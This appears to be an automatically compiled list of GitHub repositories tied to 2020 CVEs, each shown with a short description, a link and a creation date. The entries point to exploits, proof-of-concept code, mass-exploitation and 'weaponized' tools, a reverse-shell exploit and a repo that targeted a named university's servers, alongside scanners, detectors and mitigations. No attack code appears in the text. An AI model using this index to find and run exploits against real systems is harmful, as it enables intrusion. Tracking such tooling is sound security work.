**CVE-2020-15227 checker** : [filipsedivy/CVE-2020-15227](https://api.github.com/repos/filipsedivy/CVE-2020-15227) create time: 2020-11-15T15:30:01Z

**None** : [HYWZ36/CVE-2020-14645-code](https://api.github.com/repos/HYWZ36/CVE-2020-14645-code) create time: 2020-10-21T10:47:07Z

**CVE-2020–14882、CVE-2020–14883** : [jas502n/CVE-2020-14882](https://api.github.com/repos/jas502n/CVE-2020-14882) create time: 2020-10-28T11:43:37Z

**Fix CVE-2020-15228 (set-env, add-path in Github-Actions)** : [guettli/fix-CVE-2020-15228](https://api.github.com/repos/guettli/fix-CVE-2020-15228) create time: 2020-11-12T11:59:47Z

**None** : [b1ack0wl/CVE-2020-1472](https://api.github.com/repos/b1ack0wl/CVE-2020-1472) create time: 2020-11-16T17:24:25Z

**CVE-2020-1472** : [Whippet0/CVE-2020-1472](https://api.github.com/repos/Whippet0/CVE-2020-1472) create time: 2020-09-28T09:54:31Z

**None** : [BabyTeam1024/CVE-2020-14882](https://api.github.com/repos/BabyTeam1024/CVE-2020-14882) create time: 2020-11-17T14:23:23Z

**Advisory for CVE-2020-28054 & stack based buffer overflow in IBM Tivoli Storage Manager** : [VoidSec/Tivoli-Madness](https://api.github.com/repos/VoidSec/Tivoli-Madness) create time: 2020-11-16T09:27:33Z

**CVE-2020-3452** : [grim3/CVE-2020-3452](https://api.github.com/repos/grim3/CVE-2020-3452) create time: 2020-11-18T21:31:50Z

**None** : [lp008/CVE-2020-13942](https://api.github.com/repos/lp008/CVE-2020-13942) create time: 2020-11-18T10:29:47Z

**None** : [masahiro331/CVE-2020-8277](https://api.github.com/repos/masahiro331/CVE-2020-8277) create time: 2020-11-18T10:57:13Z

**None** : [MasterSploit/LPE---CVE-2020-0796](https://api.github.com/repos/MasterSploit/LPE---CVE-2020-0796) create time: 2020-11-20T09:00:08Z

**None** : [blackmarketer/CVE-2020-13942](https://api.github.com/repos/blackmarketer/CVE-2020-13942) create time: 2020-11-21T08:48:46Z

**Outlook 2019 Remote Command Execution** : [MasterSploit/CVE-2020-16947](https://api.github.com/repos/MasterSploit/CVE-2020-16947) create time: 2020-11-21T08:58:32Z

**Playground Sessions - Storing User Credentials in Plaintext** : [nathunandwani/CVE-2020-24227](https://api.github.com/repos/nathunandwani/CVE-2020-24227) create time: 2020-11-21T12:55:42Z

**RCE exploit for AVideo < 8.9 (CVE-2020-23489 & CVE-2020-23490)** : [ahussam/AVideo3xploit](https://api.github.com/repos/ahussam/AVideo3xploit) create time: 2020-07-03T17:27:12Z

**None** : [yhsung/cve-2020-27955-poc](https://api.github.com/repos/yhsung/cve-2020-27955-poc) create time: 2020-11-22T02:59:46Z

**CVE-2020-13942 POC + Automation Script** : [shifa123/CVE-2020-13942-POC-](https://api.github.com/repos/shifa123/CVE-2020-13942-POC-) create time: 2020-11-20T23:25:44Z

**Writeup on CVE-2020-28328: SuiteCRM Log File Remote Code Execution plus some bonus Cross-Site Scripting** : [mcorybillington/SuiteCRM-RCE](https://api.github.com/repos/mcorybillington/SuiteCRM-RCE) create time: 2020-11-06T00:56:36Z

**None** : [r00t4dm/CVE-2020-27955](https://api.github.com/repos/r00t4dm/CVE-2020-27955) create time: 2020-11-24T02:40:04Z

**CVE-2020-15999** : [marcinguy/CVE-2020-15999](https://api.github.com/repos/marcinguy/CVE-2020-15999) create time: 2020-10-28T16:16:25Z

**CVE-2020-6308 mass exploiter/fuzzer.** : [freeFV/CVE-2020-6308-mass-exploiter](https://api.github.com/repos/freeFV/CVE-2020-6308-mass-exploiter) create time: 2020-12-30T03:08:17Z

**CVE-2020-29070 write-up.** : [aslanemre/cve-2020-29070](https://api.github.com/repos/aslanemre/cve-2020-29070) create time: 2020-11-25T08:25:36Z

**A CVE-2020-17087 PoC.** : [revengsh/CVE-2020-17087](https://api.github.com/repos/revengsh/CVE-2020-17087) create time: 2020-11-26T03:21:34Z

**authenticated arbitrary file read for Gitlab (CVE-2020-10977)** : [JustMichi/CVE-2020-10977.py](https://api.github.com/repos/JustMichi/CVE-2020-10977.py) create time: 2020-11-25T22:48:26Z

**CVE-2020-2883** : [Al1ex/CVE-2020-2883](https://api.github.com/repos/Al1ex/CVE-2020-2883) create time: 2020-11-26T14:10:25Z

**None** : [0x240x23elu/CVE-2020-28948-and-CVE-2020-28949](https://api.github.com/repos/0x240x23elu/CVE-2020-28948-and-CVE-2020-28949) create time: 2020-11-27T11:21:46Z

**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://api.github.com/repos/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**None** : [aslanemre/CVE-2020-29364](https://api.github.com/repos/aslanemre/CVE-2020-29364) create time: 2020-11-27T17:01:35Z

**Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.** : [appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652](https://api.github.com/repos/appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652) create time: 2020-11-30T09:23:23Z

**CVE-2020-14882批量验证工具。** : [GGyao/CVE-2020-14882_POC](https://api.github.com/repos/GGyao/CVE-2020-14882_POC) create time: 2020-10-31T01:43:54Z

**CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。** : [GGyao/CVE-2020-14882_ALL](https://api.github.com/repos/GGyao/CVE-2020-14882_ALL) create time: 2020-11-03T10:49:35Z

**CVE-2020-11975 CVE-2020-13942** : [1135/unomi_exploit](https://api.github.com/repos/1135/unomi_exploit) create time: 2020-11-24T05:23:42Z

**None** : [ossf-cve-benchmark/CVE-2020-11022](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-11022) create time: 2020-11-02T20:55:10Z

**None** : [ossf-cve-benchmark/CVE-2020-11059](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-11059) create time: 2020-11-02T20:55:12Z

**None** : [ossf-cve-benchmark/CVE-2020-15156](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15156) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-11021](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-11021) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15092](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15092) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-4051](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-4051) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-27666](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-27666) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15135](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15135) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15095](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15095) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15152](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15152) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-4059](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-4059) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-5251](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-5251) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-11079](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-11079) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-12265](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-12265) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-14000](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-14000) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15119](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15119) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-5258](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-5258) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-6836](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-6836) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7638](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7638) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7660](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7660) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7662](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7662) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7676](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7676) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7699](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7699) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7720](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7720) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-8116](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8116) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-8149](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8149) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-8192](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8192) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-8203](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8203) create time: 2020-12-01T09:45:48Z

**CVE-2020-27950 exploit** : [synacktiv/CVE-2020-27950](https://api.github.com/repos/synacktiv/CVE-2020-27950) create time: 2020-12-01T15:49:07Z

**Detection of RCE in Oracle's WebLogic Server CVE-2020-14882 / CVE-2020-14750** : [corelight/CVE-2020-14882-weblogicRCE](https://api.github.com/repos/corelight/CVE-2020-14882-weblogicRCE) create time: 2020-11-12T06:59:54Z

**Saibo Cyber Game Accelerator** : [y5s5k5/CVE-2020-23735](https://api.github.com/repos/y5s5k5/CVE-2020-23735) create time: 2020-06-30T14:51:44Z

**Drive the elves** : [y5s5k5/CVE-2020-23740](https://api.github.com/repos/y5s5k5/CVE-2020-23740) create time: 2020-07-04T00:24:12Z

**speedfan** : [y5s5k5/CVE-2020-28175](https://api.github.com/repos/y5s5k5/CVE-2020-28175) create time: 2020-10-31T06:53:41Z

**AnyView** : [y5s5k5/CVE-2020-23741](https://api.github.com/repos/y5s5k5/CVE-2020-23741) create time: 2020-07-04T23:41:12Z

**(patched) This targets McMaster University's website and takes advantage of CVE-2020-14882 in the outdated version of WebLogic Server (12.2.1.3.0), which is present in the university's subdomains, mosaic.mcmaster.ca and epprd.uts.mcmaster.ca.** : [Umarovm/-Patched-McMaster-University-Blind-Command-Injection](https://api.github.com/repos/Umarovm/-Patched-McMaster-University-Blind-Command-Injection) create time: 2020-10-29T01:28:41Z

**Zeek Plugin that detects CallStranger (CVE-2020-12695) attempts (http://callstranger.com/)** : [corelight/callstranger-detector](https://api.github.com/repos/corelight/callstranger-detector) create time: 2020-06-10T14:18:34Z

**The following is the outcome of playing with CVE-2020-1472 and attempting to automate the process of gaining a shell on the DC** : [JayP232/The_big_Zero](https://api.github.com/repos/JayP232/The_big_Zero) create time: 2020-11-10T22:29:56Z

**IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)** : [Ibonok/CVE-2020-4463](https://api.github.com/repos/Ibonok/CVE-2020-4463) create time: 2020-08-13T09:03:40Z

**Python script to scan for enabled OpenSLP services** : [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://api.github.com/repos/HynekPetrak/CVE-2019-5544_CVE-2020-3992) create time: 2020-12-01T13:49:26Z

**该脚本为Citrix XenMobile 目录遍历漏洞(CVE-2020-8209)批量检测脚本。** : [B1anda0/CVE-2020-8209](https://api.github.com/repos/B1anda0/CVE-2020-8209) create time: 2020-11-17T07:20:46Z

**CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost** : [danigargu/CVE-2020-0796](https://api.github.com/repos/danigargu/CVE-2020-0796) create time: 2020-03-30T11:42:56Z

**None** : [refi64/CVE-2020-25265-25266](https://api.github.com/repos/refi64/CVE-2020-25265-25266) create time: 2020-09-17T20:25:02Z

**CVE-2020-26217 XStream RCE POC** : [novysodope/CVE-2020-26217-XStream-RCE-POC](https://api.github.com/repos/novysodope/CVE-2020-26217-XStream-RCE-POC) create time: 2020-12-08T07:58:41Z

**POC-CVE-2020-7961-Token-iterate** : [shacojx/POC-CVE-2020-7961-Token-iterate](https://api.github.com/repos/shacojx/POC-CVE-2020-7961-Token-iterate) create time: 2020-12-08T08:22:18Z

**Remote code execution in Mediawiki Score** : [seqred-s-a/cve-2020-29007](https://api.github.com/repos/seqred-s-a/cve-2020-29007) create time: 2020-12-08T13:27:31Z

**None** : [ossf-cve-benchmark/CVE-2020-15123](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15123) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15138](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15138) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-4066](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-4066) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7656](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7656) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-7752](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7752) create time: 2020-11-02T20:55:15Z

**None** : [ossf-cve-benchmark/CVE-2020-8135](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8135) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-8205](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8205) create time: 2020-12-01T09:45:48Z

**None** : [ossf-cve-benchmark/CVE-2020-15256](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-15256) create time: 2020-12-08T13:40:01Z

**None** : [ossf-cve-benchmark/CVE-2020-8244](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-8244) create time: 2020-12-08T13:40:01Z

**None** : [ossf-cve-benchmark/CVE-2020-26226](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-26226) create time: 2020-12-08T13:40:01Z

**None** : [ossf-cve-benchmark/CVE-2020-7750](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7750) create time: 2020-12-08T13:40:01Z

**None** : [ossf-cve-benchmark/CVE-2020-7763](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-7763) create time: 2020-12-08T13:40:01Z

**Proof of Concept (PoC) for CVE-2020-5248.** : [indevi0us/CVE-2020-5248](https://api.github.com/repos/indevi0us/CVE-2020-5248) create time: 2020-10-09T12:31:19Z

**Ladon Scanner For Python, Large Network Penetration Scanner & Cobalt Strike, vulnerability / exploit / detection / MS17010/SmbGhost/CVE-2020-0796/CVE-2018-2894** : [k8gege/PyLadon](https://api.github.com/repos/k8gege/PyLadon) create time: 2019-11-19T16:51:39Z

**None** : [ciakim/CVE-2020-17530](https://api.github.com/repos/ciakim/CVE-2020-17530) create time: 2020-12-08T15:48:29Z

**Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。** : [pangyu360es/CVE-2020-17530](https://api.github.com/repos/pangyu360es/CVE-2020-17530) create time: 2020-12-09T01:29:23Z

**Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。提醒我校Apache Struts用户尽快采取安全措施阻止漏洞攻击。** : [154802388/CVE-2020-17531](https://api.github.com/repos/154802388/CVE-2020-17531) create time: 2020-12-09T08:01:10Z

**hack,poc** : [phil-fly/CVE-2020-17530](https://api.github.com/repos/phil-fly/CVE-2020-17530) create time: 2020-12-08T11:10:46Z

**None** : [ka1n4t/CVE-2020-17530](https://api.github.com/repos/ka1n4t/CVE-2020-17530) create time: 2020-12-09T09:53:08Z

**None** : [ossf-cve-benchmark/CVE-2020-9038](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-9038) create time: 2020-12-08T13:40:01Z

**None** : [ossf-cve-benchmark/CVE-2020-26256](https://api.github.com/repos/ossf-cve-benchmark/CVE-2020-26256) create time: 2020-12-09T18:46:54Z

**weaponized tool for CVE-2020-17144** : [zcgonvh/CVE-2020-17144](https://api.github.com/repos/zcgonvh/CVE-2020-17144) create time: 2020-12-09T20:57:16Z

**CVE-2020-1971 Auto Scan & Remote Exploit Script. Auto Local Scan & Patch Script.** : [MBHudson/CVE-2020-1971](https://api.github.com/repos/MBHudson/CVE-2020-1971) create time: 2020-12-09T21:32:15Z

**Poc of CVE-2020-0113 & CVE-2020-0108** : [XDo0/ServiceCheater](https://api.github.com/repos/XDo0/ServiceCheater) create time: 2020-12-06T13:27:33Z

**None** : [jet-pentest/CVE-2020-29666](https://api.github.com/repos/jet-pentest/CVE-2020-29666) create time: 2020-12-10T06:24:48Z

**None** : [jet-pentest/CVE-2020-29667](https://api.github.com/repos/jet-pentest/CVE-2020-29667) create time: 2020-12-10T06:43:58Z

**None** : [williamgoulois/git-lfs-RCE-exploit-CVE-2020-27955-revshell](https://api.github.com/repos/williamgoulois/git-lfs-RCE-exploit-CVE-2020-27955-revshell) create time: 2020-12-10T21:31:24Z

**A mass exploitation tool for CVE 2020-8793 ** : [rpie/OpenSMTPD](https://api.github.com/repos/rpie/OpenSMTPD) create time: 2020-11-29T22:50:00Z

**None** : [MasterSploit/CVE-2020-0787](https://api.github.com/repos/MasterSploit/CVE-2020-0787) create time: 2020-12-11T09:27:34Z

**None** : [MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master](https://api.github.com/repos/MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master) create time: 2020-12-11T09:31:06Z

**Double Free** : [brahmiboudjema/CVE-2020-25637-libvirt-double-free](https://api.github.com/repos/brahmiboudjema/CVE-2020-25637-libvirt-double-free) create time: 2020-12-04T11:01:29Z

**CVE-2020-8554: Man in the middle using LoadBalancer or ExternalIPs** : [rancher/externalip-webhook](https://api.github.com/repos/rancher/externalip-webhook) create time: 2020-12-01T16:58:39Z

**Macally WIFISD2** : [code-byter/CVE-2020-29669](https://api.github.com/repos/code-byter/CVE-2020-29669) create time: 2020-12-03T20:00:09Z

**None** : [cygenta/CVE-2020-3452](https://api.github.com/repos/cygenta/CVE-2020-3452) create time: 2020-12-13T13:47:38Z

**CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.** : [jas502n/CVE-2020-26259](https://api.github.com/repos/jas502n/CVE-2020-26259) create time: 2020-12-13T17:39:11Z

**None** : [qlh831/x-CVE-2020-27190](https://api.github.com/repos/qlh831/x-CVE-2020-27190) create time: 2020-12-14T06:44:37Z

**CVE-2020-17530-strust2-061** : [fengziHK/CVE-2020-17530-strust2-061](https://api.github.com/repos/fengziHK/CVE-2020-17530-strust2-061) create time: 2020-12-14T06:54:57Z

**https://hackerone.com/reports/865652** : [skr0x1c0/Blind-SSRF-CVE-2020-15002](https://api.github.com/repos/skr0x1c0/Blind-SSRF-CVE-2020-15002) create time: 2020-12-14T07:48:44Z

**https://hackerone.com/reports/863553** : [skr0x1c0/SSRF-CVE-2020-15002](https://api.github.com/repos/skr0x1c0/SSRF-CVE-2020-15002) create time: 2020-12-14T07:50:45Z

**cve-2020-0022相关的一些东西** : [5k1l/cve-2020-0022](https://api.github.com/repos/5k1l/cve-2020-0022) create time: 2020-12-16T06:25:41Z

**POC for CVE-2020-27955** : [shubham0d/CVE-2020-27955](https://api.github.com/repos/shubham0d/CVE-2020-27955) create time: 2020-12-17T06:14:30Z

**MOVEit Transfer 2020 web application Stored Cross-Site Scripting (XSS)** : [SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647](https://api.github.com/repos/SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647) create time: 2020-12-17T12:23:18Z

**S2-061 的payload,以及对应简单的PoC/Exp** : [wuzuowei/CVE-2020-17530](https://api.github.com/repos/wuzuowei/CVE-2020-17530) create time: 2020-12-10T17:42:37Z

**(cve-2020-17530) struts2_s2-061 freemarker_RCE testscript** : [ludy-dev/freemarker_RCE_struts2_s2-061](https://api.github.com/repos/ludy-dev/freemarker_RCE_struts2_s2-061) create time: 2020-12-18T07:03:57Z

**SnatchBox (CVE-2020-27935) is a sandbox escape vulnerability and exploit affecting macOS up to version 10.15.x** : [LIJI32/SnatchBox](https://api.github.com/repos/LIJI32/SnatchBox) create time: 2020-12-18T14:39:28Z

**A generative test that would've caught CVE-2020-28052** : [madstap/bouncy-castle-generative-test-poc](https://api.github.com/repos/madstap/bouncy-castle-generative-test-poc) create time: 2020-12-19T22:22:45Z

**None** : [seemoo-lab/dtrace-memaccess_cve-2020-27949](https://api.github.com/repos/seemoo-lab/dtrace-memaccess_cve-2020-27949) create time: 2020-12-14T19:39:42Z

**CVE-2020-13942 unauthenticated RCE POC through MVEL and OGNL injection** : [eugenebmx/CVE-2020-13942](https://api.github.com/repos/eugenebmx/CVE-2020-13942) create time: 2020-11-19T08:22:17Z

**[CVE-2020-1948] Apache Dubbo Provider default deserialization cause RCE** : [L0kiii/Dubbo-deserialization](https://api.github.com/repos/L0kiii/Dubbo-deserialization) create time: 2020-07-14T02:42:41Z

**woocommerce wordpress plugin - Affected Version: V 4.5.2 [CVE-2020-29156]** : [Ko-kn3t/CVE-2020-29156](https://api.github.com/repos/Ko-kn3t/CVE-2020-29156) create time: 2020-12-21T20:38:50Z

**CVE-2020-13942 Apache Unomi 远程代码执行漏洞脚getshell** : [yaunsky/Unomi-CVE-2020-13942](https://api.github.com/repos/yaunsky/Unomi-CVE-2020-13942) create time: 2020-12-22T02:57:50Z

**2020 OPEN SOURCE SECURITY AND RISK ANALYSIS REPORT | synopsys.com Table of contents Introduction ................................................................................................................................................................................1 Industries represented in the 2020 OSSRA report...................................................................................................................................................................3 2020 Open Source Security and Risk Analysis ........................................................................................................................4 The need for a software bill of materials...................................................................................................................................................................................7 Open source composition of codebases audited in 2019 ..................................................................................................................................................... 7 What open source components are in use? .............................................................................................................................................................................9 Open source rules! But unpatched vulnerabilities still threaten............................................................................................13 Augmenting CVE vulnerability information with BDSAs.......................................................................................................................................................15 Digging deeper into vulnerabilities found in 2019..................................................................................................................................................................15 High-risk vulnerabilities ...............................................................................................................................................................................................................15 Setting vulnerability patching priorities....................................................................................................................................................................................18 Open source license and legal developments in 2019..........................................................................................................20 Open source license risk.............................................................................................................................................................................................................21 Licensing legal developments in 2019.....................................................................................................................................................................................23 Examining license risk in open source components.............................................................................................................................................................25 Open source components with no licenses or custom licenses ........................................................................................................................................26 Operational factors in open source use .................................................................................................................................29 Conclusion................................................................................................................................................................................32 Appendix A ....................................................................** : [phillip1978W/phill](https://api.github.com/repos/phillip1978W/phill) create time: 2020-12-22T09:14:36Z

**S2-061 CVE-2020-17530** : [Al1ex/CVE-2020-17530](https://api.github.com/repos/Al1ex/CVE-2020-17530) create time: 2020-12-13T11:02:15Z

**Prisma Cloud Compute Admission rules to mitigate Kubernetes CVE-2020-8554** : [twistlock/k8s-cve-2020-8554-mitigations](https://api.github.com/repos/twistlock/k8s-cve-2020-8554-mitigations) create time: 2020-12-20T04:22:43Z

**None** : [SaharAttackit/CVE-2020-1472](https://api.github.com/repos/SaharAttackit/CVE-2020-1472) create time: 2020-12-23T08:12:21Z

**cve-2020-17057 poc** : [ze0r/cve-2020-17057](https://api.github.com/repos/ze0r/cve-2020-17057) create time: 2020-12-23T10:02:47Z

**Webmin Exploit Scanner CVE-2020-35606 CVE-2019-12840** : [anasbousselham/webminscan](https://api.github.com/repos/anasbousselham/webminscan) create time: 2020-12-23T18:22:36Z

**Brute-force tool for WordPress Plugin Limit Login Attempts Reloaded >=2.13.0 - Login Limit Bypass (CVE-2020-35590)** : [N4nj0/CVE-2020-35590](https://api.github.com/repos/N4nj0/CVE-2020-35590) create time: 2020-12-23T23:11:34Z

**CVE-2020-17008 splWOW64 Elevation of Privilege** : [jas502n/CVE-2020-17008](https://api.github.com/repos/jas502n/CVE-2020-17008) create time: 2020-12-24T04:00:29Z

**Exchange2010 authorized RCE** : [Airboi/CVE-2020-17144-EXP](https://api.github.com/repos/Airboi/CVE-2020-17144-EXP) create time: 2020-12-09T10:30:16Z

**Weblogic Server CVE-2020-14645 EXP for Python (complete in one step)** : [Schira4396/CVE-2020-14645](https://api.github.com/repos/Schira4396/CVE-2020-14645) create time: 2020-12-24T05:46:55Z

**Insecure Folder permission that lead to privilege escalation** : [zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169](https://api.github.com/repos/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169) create time: 2020-12-24T10:27:30Z

**CVE-2020-8289 – Remote Code Execution as SYSTEM/root via Backblaze** : [geffner/CVE-2020-8289](https://api.github.com/repos/geffner/CVE-2020-8289) create time: 2020-09-09T14:39:16Z

**CVE-2020-8290 – Elevation of Privilege in Backblaze** : [geffner/CVE-2020-8290](https://api.github.com/repos/geffner/CVE-2020-8290) create time: 2020-09-09T14:42:36Z

**Wing FTP Server 6.2.3 - Privilege Escalation** : [Al1ex/CVE-2020-8635](https://api.github.com/repos/Al1ex/CVE-2020-8635) create time: 2020-12-25T01:15:13Z

**Wing FTP Server 6.2.5 - Privilege Escalation** : [Al1ex/CVE-2020-9470](https://api.github.com/repos/Al1ex/CVE-2020-9470) create time: 2020-12-25T01:53:45Z

**CVE-2020-11652 & CVE-2020-11651** : [Al1ex/CVE-2020-11652](https://api.github.com/repos/Al1ex/CVE-2020-11652) create time: 2020-12-25T02:58:35Z

**None** : [datntsec/CVE-2020-0796](https://api.github.com/repos/datntsec/CVE-2020-0796) create time: 2020-11-10T02:35:34Z

**The (WordPress) website test script can be exploited for Unlimited File Upload via CVE-2020-35489** : [dn9uy3n/Check-WP-CVE-2020-35489](https://api.github.com/repos/dn9uy3n/Check-WP-CVE-2020-35489) create time: 2020-12-24T09:10:17Z

**None** : [taipansec/CVE-2020-8165](https://api.github.com/repos/taipansec/CVE-2020-8165) create time: 2020-12-25T20:07:27Z

**This is a test to exploit with CVE-2020-27955** : [SilverSkyFlyingFeather/CVE-2020-27955-TEST](https://api.github.com/repos/SilverSkyFlyingFeather/CVE-2020-27955-TEST) create time: 2020-12-26T08:17:43Z

**None** : [Tempuss/CTF_CVE-2020-7471](https://api.github.com/repos/Tempuss/CTF_CVE-2020-7471) create time: 2020-08-03T05:29:25Z

**CVE-2020-17035 patch analysis** : [flamelu/CVE-2020-17035-patch-analysis](https://api.github.com/repos/flamelu/CVE-2020-17035-patch-analysis) create time: 2020-12-28T07:50:00Z

**Jackson-databind远程代码执行漏洞(CVE-2020-8840)分析复现环境代码** : [Veraxy00/CVE-2020-8840](https://api.github.com/repos/Veraxy00/CVE-2020-8840) create time: 2020-11-11T07:53:21Z

**None** : [rdoix/CVE-2020-10148-Solarwinds-Orion](https://api.github.com/repos/rdoix/CVE-2020-10148-Solarwinds-Orion) create time: 2020-12-29T03:17:56Z

**cve-2020-27955** : [TheTh1nk3r/cve-2020-27955](https://api.github.com/repos/TheTh1nk3r/cve-2020-27955) create time: 2020-12-28T13:27:27Z

**PoC CVE-2020-6308** : [InitRoot/CVE-2020-6308-PoC](https://api.github.com/repos/InitRoot/CVE-2020-6308-PoC) create time: 2020-12-27T10:37:11Z

**Campeonato Virtual Equipado Powerlifting 2020** : [Fedepotencia/2020_CVEP](https://api.github.com/repos/Fedepotencia/2020_CVEP) create time: 2020-12-29T17:12:06Z

**Dicha vulnerabilidad se presentaba en la funcionalidad mc_project_get_users, y su detección es tan solo modificando y enviando el parámetro “access” sin ningún valor y cambiando el tipo de valor a String.** : [EthicalHCOP/CVE-2020-28413_Mantis2.24.3-SQLi-SOAP](https://api.github.com/repos/EthicalHCOP/CVE-2020-28413_Mantis2.24.3-SQLi-SOAP) create time: 2020-11-10T16:50:55Z

**None** : [CyborgSecurity/CVE-2020-17530](https://api.github.com/repos/CyborgSecurity/CVE-2020-17530) create time: 2020-12-30T17:23:20Z

**Repositorio con un script encargado de explotar la vulnerabilidad CVE-2020-15999** : [maarlo/CVE-2020-15999](https://api.github.com/repos/maarlo/CVE-2020-15999) create time: 2020-12-30T18:02:23Z

